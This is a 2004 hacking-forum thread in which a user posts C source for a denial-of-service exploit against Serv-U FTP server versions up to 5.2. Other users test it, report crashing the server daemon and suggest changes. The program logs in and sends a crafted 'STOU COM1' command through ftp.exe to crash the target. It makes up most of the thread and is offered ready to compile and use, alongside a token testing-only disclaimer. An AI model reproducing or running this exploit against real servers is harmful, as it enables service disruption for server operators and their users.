Thanks to Ecko for his Perl exploit....made me think of doing this one and it was challenging
This exploit is not as good as Ecko's one if you can run Perl code, but if you can't you can use this one if you have ftp.exe in your computer root....I'll try making a code that doesn't need ftp.exe later....
Use it with your mind....nothing illegal too !
CODE
//-------------------------------------------------------------------------------- // Serv-U (up to 5.2) DoS Exploit by Mortello // Advisory : http://www.SecurityTracker.com/alerts/2004/Sep/1011219.html // This exploit requires that you have ftp.exe in your systemroot. // Couldn't figure out how to get the %systemroot% in the spawnl(), so any idea // would be appreciated... // This is my first exploit....guess the code could have been better, now I'm // going to try to make a DoS exploit not using the ftp.exe... // Dedicated to : The piece of cheddar and the limonade I took doing this code. // Greetings : You know who you are ! // Use this program on YOUR computer ONLY for TESTING purposes ONLY. I take no // responsibility on the other uses of this program ! //--------------------------------------------------------------------------------
#include <stdio.h> #include <process.h>
/* The following function will help the user understand how to use this program. */ void usage(char name[]); /* Program call to create a ftp.txt file.*/ void file(void); /* Call ftp.exe and execute it using the ftp.txt created earlier. */ void execute(void);
char *ip; int port; char *user; char *password;
int main(int argc, char* argv[]) { if (argc <5) usage(argv[0]); else if (atoi(argv[2]) < 0 || atoi(argv[2]) > 65535) usage(argv[0]); else { ip = argv[1]; port = atoi(argv[2]); user = argv[3]; password = argv[4]; puts("Serv-U STOU DoS Exploit by Mortello"); file(); execute(); } return 0; }
// How to use the program ! void usage(char name[]) { puts(""); puts("*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*"); puts(" Serv-U Denial Of Service, tested on Serv-U 5.1.0.0 and 5.0.0.0."); puts(" Should work on latest serv-U (as of Sept. 12th, 2004)"); puts(" Use this program on YOUR computer ONLY for TESTING purposes ONLY. I take no"); puts(" responsibility on the other uses of this program !"); puts(" USAGE :"); printf(" %s \"IP\" \"PORT\" \"USERNAME\" \"PASSWORD\"\n", name); puts(" Account needs to be able to log-in, nothing else necessary."); puts("*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*"); puts(""); }
void file() { FILE *fp; // Will write in a ftp.txt file. if ((fp = fopen("ftp.txt", "w")) != NULL) { fprintf(fp, "open %s %d\n", ip, port); fprintf(fp, "%s\n", user); fprintf(fp, "%s\n", password); fprintf(fp, "binary\n"); fprintf(fp, "quote STOU COM1\n"); //Would also have worked : //fprintf(fp, "quote STOU LPT1\n"); //fprintf(fp, "quote STOU PRN\n"); //fprintf(fp, "quote STOU AUX\n"); fprintf(fp, "quit");//If ftp.exe goes through this line, DoS didn't work. fclose(fp); } else // You don't have write perms on your comp ? strange ! puts("No write permissions ?"); }
void execute() { int value; // Part of code that I couldn't make work with %systemroot% value = spawnl(P_WAIT, "c:\\winnt\\system32\\ftp.exe", "ftp.exe", " -i -s:ftp.txt", NULL); value = spawnl(P_WAIT, "c:\\windows\\system32\\ftp.exe", "ftp.exe", " -i -s:ftp.txt", NULL); if (value == -1) puts("Problem!"); else { remove("ftp.txt"); puts("Server should have crashed by now !"); } }
mortello
Sep 13 2004, 02:16 AM
Here it is compiled for you !
nackas
Sep 13 2004, 06:19 AM
Hmm interesting stuff mortello! Will test this on my local ftp and see how it goes
EDIT: ServUDaemon.exe has encountered a problem and needs to close. We are sorry for the inconvenience. Nice one!
arn0ld
Sep 13 2004, 10:04 AM
for me not saying "problem!" on and on and i'm sure the pass user are correct
Paul
Sep 13 2004, 03:35 PM
The "bug" itself sux, but its nice to see some1 code an sploit for it. Good job
mortello
Sep 13 2004, 03:41 PM
QUOTE (arn0ld @ Sep 13 2004, 10:04 AM)
for me not saying "problem!" on and on and i'm sure the pass user are correct
what's your %systemroot% ? if it is c:\winnt\ or c:\windows then you don't have ftp.exe in that folder and there is a problem....hence the "Problem!" Otherwise, you have a different %systemroot% and I'd like to add it to the code if you could tell me what it is
usch
Sep 13 2004, 03:49 PM
ehm dude. just use "ftp.exe" instead of "C:\windows..." cause ftp.exe is recognized as a windows program and can be accessed from anywhere, so u dont need the path. e.g. this line of code works i tested it: WinExec("ftp.exe",SW_SHOW);
hope i helped
see ya usch
mortello
Sep 13 2004, 04:24 PM
QUOTE (usch @ Sep 13 2004, 03:49 PM)
ehm dude. just use "ftp.exe" instead of "C:\windows..." cause ftp.exe is recognized as a windows program and can be accessed from anywhere, so u dont need the path. e.g. this line of code works i tested it: WinExec("ftp.exe",SW_SHOW);
hope i helped
see ya usch
I tried using it with spawnl() but it didn't work....
I'll check some info on WinExec(...) and see what that does....thanks for the feedback
Figo
Sep 14 2004, 06:58 AM
QUOTE (usch @ Sep 13 2004, 03:49 PM)
ehm dude. just use "ftp.exe" instead of "C:\windows..." cause ftp.exe is recognized as a windows program and can be accessed from anywhere, so u dont need the path. e.g. this line of code works i tested it: WinExec("ftp.exe",SW_SHOW);
hope i helped
see ya usch
be sure c:\%systemroot%\system32\ is in ur path definition eh
dmg
Sep 20 2004, 07:29 PM
system("ftp.exe -i -s:ftp.txt");
should also work (not tested)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
